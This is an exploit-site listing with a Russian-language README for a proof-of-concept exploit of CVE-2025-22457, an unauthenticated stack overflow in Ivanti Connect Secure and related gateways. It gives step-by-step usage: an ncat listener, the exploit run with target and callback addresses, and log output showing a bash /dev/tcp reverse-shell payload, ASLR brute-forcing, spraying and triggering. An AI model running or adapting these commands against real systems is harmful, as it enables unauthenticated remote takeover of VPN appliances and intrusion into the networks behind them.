Sploitus

Exploit for CVE-2025-22457

kitploit · 2026-08-27

Exploit Code

MARKDOWN37 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TRONE-UX-CVE-2025-22457
# PoC для CVE-2025-22457

_Уязвимость переполнения буфера стека без аутентификации, затрагивающая Ivanti Connect Secure, Pulse Connect Secure, Ivanti Policy Secure и ZTA Gateways_

## Обзор

Это proof-of-concept эксплойт для демонстрации эксплуатации CVE-2025-22457. Полный технический анализ уязвимости и стратегии эксплуатации см. в анализе Rapid7 по ссылке:

https://attackerkb.com/topics/0ybGQIkHzR/cve-2025-22457/rapid7-analysis

## Использование

Мы можем запустить этот скрипт против уязвимой цели Ivanti Connect Secure версии 22.7r2.4 следующим образом:

Запустите netcat слушатель для получения обратной оболочки.

root@kitploit:~
    
    
    C:\>ncat -lnvkp 8080
    

Запустите эксплойт с перебором ASLR (это будет медленно).

root@kitploit:~
    
    
    C:\>ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080
    [2025-04-10 16:21:13 +0100] [+] Targeting https://192.168.86.111:443/
    [2025-04-10 16:21:13 +0100] [+] Payload: bash -i >& /dev/tcp/192.168.86.35/8080 0>&1
    [2025-04-10 16:21:13 +0100] [+] Detected version 22.7.2.3597
    [2025-04-10 16:21:13 +0100] [+] Starting...
    [2025-04-10 16:21:13 +0100] [+] Attempt 0, trying libdsplibs.so @ 0xf64ca000
    [2025-04-10 16:21:13 +0100]     Making connections...
    [2025-04-10 16:21:18 +0100]     Spraying...
    [2025-04-10 16:22:27 +0100]     Triggering..